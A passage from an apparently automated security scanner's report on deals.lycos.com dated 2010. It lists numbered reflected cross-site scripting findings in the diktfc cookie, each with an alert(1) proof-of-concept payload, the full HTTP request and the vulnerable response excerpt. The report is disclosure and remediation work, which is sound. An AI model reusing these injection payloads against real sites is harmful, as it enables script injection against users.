<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
ext/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/lg-42-1080p-lcd-hdtv-for-479-414598",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aeb5d0";alert(1)//a5de5727a34"
});
</script>
...[SNIP]...

1.209. http://deals.lycos.com/deal/logmein-ignition-for-iphone-for-20-413418 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/logmein-ignition-for-iphone-for-20-413418

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f448f"><script>alert(1)</script>e4b28d91281 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/logmein-ignition-for-iphone-for-20-413418 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Af448f"><script>alert(1)</script>e4b28d91281; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:11 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:11 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18186

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/logmein-ignition-for-iphone-for-20-413418&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Af448f"><script>alert(1)</script>e4b28d91281&amp;cj=1" alt="tracker" />
...[SNIP]...

1.210. http://deals.lycos.com/deal/logmein-ignition-for-iphone-for-20-413418 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/logmein-ignition-for-iphone-for-20-413418

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6f691"%3balert(1)//38cfa6531c3 was submitted in the diktfc cookie. This input was echoed as 6f691";alert(1)//38cfa6531c3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/logmein-ignition-for-iphone-for-20-413418 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A6f691"%3balert(1)//38cfa6531c3; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:12 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:12 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18152

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
vascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/logmein-ignition-for-iphone-for-20-413418",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A6f691";alert(1)//38cfa6531c3"
});
</script>
...[SNIP]...

1.211. http://deals.lycos.com/deal/mirror-s-edge-for-iphone-for-1-414300 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/mirror-s-edge-for-iphone-for-1-414300

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa8ec"><script>alert(1)</script>6cc672e8440 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/mirror-s-edge-for-iphone-for-1-414300 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aaa8ec"><script>alert(1)</script>6cc672e8440; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:45 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:45 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17872

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
src="http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/mirror-s-edge-for-iphone-for-1-414300&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Aaa8ec"><script>alert(1)</script>6cc672e8440&amp;cj=1" alt="tracker" />
...[SNIP]...

1.212. http://deals.lycos.com/deal/mirror-s-edge-for-iphone-for-1-414300 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/mirror-s-edge-for-iphone-for-1-414300

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4d87f"%3balert(1)//0adce29b43c was submitted in the diktfc cookie. This input was echoed as 4d87f";alert(1)//0adce29b43c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/mirror-s-edge-for-iphone-for-1-414300 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A4d87f"%3balert(1)//0adce29b43c; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:47 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:47 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17841

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
t/javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/mirror-s-edge-for-iphone-for-1-414300",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A4d87f";alert(1)//0adce29b43c"
});
</script>
...[SNIP]...

1.213. http://deals.lycos.com/deal/mogo-talk-bluetooth-headset-for-iphone-20-413971 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/mogo-talk-bluetooth-headset-for-iphone-20-413971

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 56d85"%3balert(1)//7f46c76a176 was submitted in the diktfc cookie. This input was echoed as 56d85";alert(1)//7f46c76a176 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/mogo-talk-bluetooth-headset-for-iphone-20-413971 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A56d85"%3balert(1)//7f46c76a176; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:02 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:03 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17716

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
t">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/mogo-talk-bluetooth-headset-for-iphone-20-413971",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A56d85";alert(1)//7f46c76a176"
});
</script>
...[SNIP]...

1.214. http://deals.lycos.com/deal/mogo-talk-bluetooth-headset-for-iphone-20-413971 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/mogo-talk-bluetooth-headset-for-iphone-20-413971

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7362"><script>alert(1)</script>5134e7589ce was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/mogo-talk-bluetooth-headset-for-iphone-20-413971 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Af7362"><script>alert(1)</script>5134e7589ce; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:01 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:01 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17692

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
//b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/mogo-talk-bluetooth-headset-for-iphone-20-413971&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Af7362"><script>alert(1)</script>5134e7589ce&amp;cj=1" alt="tracker" />
...[SNIP]...

1.215. http://deals.lycos.com/deal/nikon-d3000-10mp-dslr-w-lens-for-499-414265 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/nikon-d3000-10mp-dslr-w-lens-for-499-414265

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 22e54"%3balert(1)//ca2c7b2c015 was submitted in the diktfc cookie. This input was echoed as 22e54";alert(1)//ca2c7b2c015 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/nikon-d3000-10mp-dslr-w-lens-for-499-414265 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A22e54"%3balert(1)//ca2c7b2c015; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:18 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:19 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18514

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
script">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/nikon-d3000-10mp-dslr-w-lens-for-499-414265",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A22e54";alert(1)//ca2c7b2c015"
});
</script>
...[SNIP]...

1.216. http://deals.lycos.com/deal/nikon-d3000-10mp-dslr-w-lens-for-499-414265 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/nikon-d3000-10mp-dslr-w-lens-for-499-414265

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58697"><script>alert(1)</script>383e526ee99 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/nikon-d3000-10mp-dslr-w-lens-for-499-414265 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A58697"><script>alert(1)</script>383e526ee99; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:17 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:17 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18478

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/nikon-d3000-10mp-dslr-w-lens-for-499-414265&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A58697"><script>alert(1)</script>383e526ee99&amp;cj=1" alt="tracker" />
...[SNIP]...

1.217. http://deals.lycos.com/deal/nokia-2330-gophone-prepaid-for-at-and-t-for-5-413495 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/nokia-2330-gophone-prepaid-for-at-and-t-for-5-413495

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f0b2"><script>alert(1)</script>781860d6eaf was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/nokia-2330-gophone-prepaid-for-at-and-t-for-5-413495 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A7f0b2"><script>alert(1)</script>781860d6eaf; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:11 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:11 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17816

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/nokia-2330-gophone-prepaid-for-at-and-t-for-5-413495&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A7f0b2"><script>alert(1)</script>781860d6eaf&amp;cj=1" alt="tracker" />
...[SNIP]...

1.218. http://deals.lycos.com/deal/nokia-2330-gophone-prepaid-for-at-and-t-for-5-413495 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/nokia-2330-gophone-prepaid-for-at-and-t-for-5-413495

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2c764"%3balert(1)//b75df22a01a was submitted in the diktfc cookie. This input was echoed as 2c764";alert(1)//b75df22a01a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/nokia-2330-gophone-prepaid-for-at-and-t-for-5-413495 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A2c764"%3balert(1)//b75df22a01a; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:12 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:13 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17801

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/nokia-2330-gophone-prepaid-for-at-and-t-for-5-413495",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A2c764";alert(1)//b75df22a01a"
});
</script>
...[SNIP]...

1.219. http://deals.lycos.com/deal/nokia-2720-prepaid-cell-phone-for-6-413497 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/nokia-2720-prepaid-cell-phone-for-6-413497

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5c8c0"><script>alert(1)</script>d9b09df56e0 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/nokia-2720-prepaid-cell-phone-for-6-413497 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A5c8c0"><script>alert(1)</script>d9b09df56e0; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:06 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
